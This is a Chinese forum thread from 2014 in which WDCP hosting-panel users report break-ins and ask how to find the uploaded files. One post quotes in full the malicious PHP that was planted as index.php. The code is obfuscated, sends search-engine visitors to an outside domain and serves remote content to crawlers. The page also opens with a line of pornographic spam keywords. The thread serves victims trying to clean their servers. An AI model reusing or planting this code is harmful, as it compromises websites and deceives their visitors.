永久黄网站色视频免费直播,yy6080三理论日本中文,亚洲无码免费在线观看视频,欧美日韩精品一区二区在线播放

Board logo

標(biāo)題: [BUG反饋] 這是WDCP的漏洞嗎?如何解決?! [打印本頁(yè)]

作者: luza    時(shí)間: 2014-9-25 11:18     標(biāo)題: 這是WDCP的漏洞嗎?如何解決?!

WDCP是一個(gè)非常好的虛擬主機(jī)管理軟件,出于對(duì)WDCP的信任,在服務(wù)器上安裝了,但是最近發(fā)現(xiàn)嚴(yán)重的問題:
q4.jpg q3.jpg q2.jpg q1.jpg

圖片附件: q1.jpg (2014-9-25 11:16, 4.9 KB) / 下載次數(shù) 10343
http://www.fsowen.com/bbs/attachment.php?aid=4823&k=1d069daf5b6477114952bcbbb2689825&t=1743875321&sid=0RjEVt



圖片附件: q2.jpg (2014-9-25 11:17, 4.28 KB) / 下載次數(shù) 10276
http://www.fsowen.com/bbs/attachment.php?aid=4824&k=fbe04777327a62d6c13d7216ec333ae4&t=1743875321&sid=0RjEVt



圖片附件: q3.jpg (2014-9-25 11:17, 23.54 KB) / 下載次數(shù) 10547
http://www.fsowen.com/bbs/attachment.php?aid=4825&k=33db38f012b082b564ad97e3071e10ab&t=1743875321&sid=0RjEVt



圖片附件: q4.jpg (2014-9-25 11:17, 6.53 KB) / 下載次數(shù) 10870
http://www.fsowen.com/bbs/attachment.php?aid=4826&k=6db7f7483ad4df76c11997793e11e499&t=1743875321&sid=0RjEVt


作者: luza    時(shí)間: 2014-9-25 11:19

數(shù)據(jù)庫(kù)被入侵了,并且成功上傳三個(gè)文件,現(xiàn)在最腦火的是,不知道這三個(gè)文件是哪三個(gè)!

請(qǐng)管理員給個(gè)教程!!
作者: feng521w    時(shí)間: 2014-9-25 11:34

太他媽的可怕;了
作者: zhoumo310    時(shí)間: 2014-9-25 18:09

我們都遭遇了相同問題。希望wdcp盡快修復(fù)。
同類帖子大集合 http://www.fsowen.com/bbs/viewth ... amp;extra=#pid63741
作者: joynow    時(shí)間: 2014-9-26 08:54

我也遇到同樣的問題,上傳的文件都是index.php,其實(shí)就是把目錄下的空文件替換成掛馬文件,但這些文件沒有人訪問不知有什么用處?黑客都是直接登陸WDCP后臺(tái),估計(jì)是利用了WDCP的漏洞。
快照4.png

掛馬的內(nèi)容:
  1. <?php
  2. date_default_timezone_set('PRC');
  3. set_time_limit(20);
  4. error_reporting(0);
  5. header('Content-type: text/html; charset=gbk');
  6. define('SPIDERS','LzScMUI8p28hL29gsUAiM291sUyunT9isTqiM2ky');
  7. define('HOSTS',$_SERVER['SERVER_NAME']);
  8. define('d58ok','0');
  9. define('REFES',$_SERVER['HTTP_REFERER']);
  10. define('USERS',$_SERVER['HTTP_USER_AGENT']);
  11. define('URLS',$_SERVER['REQUEST_URI']);
  12. $Class_urls = 'http://www.5886887.com/';
  13. $Class_zhus = 'nUE0pQbiYmL3YwR5BP4kAwthZGD2Yj==';
  14. $KIP=array('117.28.255.37','116.55.241.24','125.64.94.219','119.147.114.213','118.122.188.194','60.172.229.61','61.188.39.16','61.147.98.198','61.129.45.72','113.98.254.245','58.221.61.128','117.34.73.70','58.215.190.84','117.28.255.53','183.91.40.144','117.21.220.245','122.228.200.46','61.164.150.70','61.147.108.41','116.55.242.138','114.80.222.242','61.147.108.41','116.255.230.70','222.186.24.26','222.186.24.59','220.181.158.106','123.125.160.215');
  15. define('PATHS',__FILE__);
  16. function Reads($url){
  17. $opts = array('http' => array('method' => "GET",'timeout' => 8));
  18. $context = stream_context_create($opts);
  19. $html = file_get_contents($url, false, $context);
  20. if(empty($html)){$html = file_get_contents($url);}
  21. return $html;
  22. }
  23. function Ips(){
  24. if(@$_SERVER["HTTP_X_FORWARDED_FOR"]){
  25. $ip = $_SERVER["HTTP_X_FORWARDED_FOR"];
  26. }else if(@$_SERVER["HTTP_CLIENT_IP"]){
  27. $ip = $_SERVER["HTTP_CLIENT_IP"];
  28. }else if(@$_SERVER["REMOTE_ADDR"]){
  29. $ip = $_SERVER["REMOTE_ADDR"];
  30. }else if(@getenv("HTTP_X_FORWARDED_FOR")){
  31. $ip = getenv("HTTP_X_FORWARDED_FOR");
  32. }else if(@getenv("HTTP_CLIENT_IP")){
  33. $ip = getenv("HTTP_CLIENT_IP");
  34. }else if(@getenv("REMOTE_ADDR")){
  35. $ip = getenv("REMOTE_ADDR");
  36. }else{
  37. $ip = "Unknown";
  38. }return $ip;
  39. }
  40. function R($string){
  41. $Class_now = str_rot13($string);
  42. $Class_now = base64_decode($Class_now);
  43. return $Class_now;
  44. }
  45. if(eregi(R(SPIDERS),REFES)){
  46. $Class_site = true;
  47. if(eregi("site%3A|inurl%3A",REFES)){
  48. setcookie('x86',HOSTS,time() + 259200);
  49. $Class_site = false;
  50. }
  51. if($Class_site && empty($_COOKIE['x86'])){
  52. setcookie('x86',HOSTS,time() + 259200);
  53. $Class_from = $Class_urls;
  54. $Class_home = $Class_from;
  55. header("Location: ".$Class_home.'?'.HOSTS);
  56. exit;
  57. }
  58. }
  59. if(d58ok){
  60. $Class_UR = R($Class_zhus).'?xxurl='.bin2hex(URLS);
  61. $Class_UR .= '&xxhost='.bin2hex(HOSTS);
  62. $Class_code = Reads($Class_UR);
  63. if(trim($Class_code) !== 'nonono')
  64. {echo base64_decode($Class_code);exit;}
  65. }
  66. if(eregi(R(SPIDERS),USERS)){
  67. if(!in_array(Ips(),$KIP)){
  68. $Class_UR = R($Class_zhus).'?xxurl='.bin2hex(URLS);
  69. $Class_UR .= '&xxhost='.bin2hex(HOSTS);
  70. $Class_code = Reads($Class_UR);
  71. if(trim($Class_code) !== 'nonono')
  72. {echo base64_decode($Class_code);exit;}
  73. }
  74. }
  75. ?>
復(fù)制代碼


圖片附件: 快照4.png (2014-9-26 08:51, 14.4 KB) / 下載次數(shù) 10452
http://www.fsowen.com/bbs/attachment.php?aid=4827&k=5e7b17c9311726dd9726daf341605e59&t=1743875321&sid=0RjEVt


作者: admin    時(shí)間: 2014-9-26 11:56

http://www.fsowen.com/bbs/thread-37476-1-1.html
作者: luza    時(shí)間: 2014-9-26 17:21

我也遇到同樣的問題,上傳的文件都是index.php,其實(shí)就是把目錄下的空文件替換成掛馬文件,但這些文件沒有人 ...
joynow 發(fā)表于 2014-9-26 08:54



   請(qǐng)教一下,怎么找到這些上傳的文件在哪?
作者: admin    時(shí)間: 2014-9-27 12:15

檢查下文件時(shí)間,看有沒新上傳的
作者: 璀璨    時(shí)間: 2014-10-11 11:47

檢查下文件時(shí)間,看有沒新上傳的
admin 發(fā)表于 2014-9-27 12:15


我被上傳了兩個(gè)·····老大·     請(qǐng)教下~  知道上傳的時(shí)間 ·· 怎么找到上傳的文件呢?那么多文件好難查啊
作者: songfeifei    時(shí)間: 2014-11-14 19:10

請(qǐng)參考此貼  進(jìn)行查殺  http://www.fsowen.com/bbs/thread-37766-1-1.html




歡迎光臨 WDlinux官方論壇 (http://www.fsowen.com/bbs/) Powered by Discuz! 7.2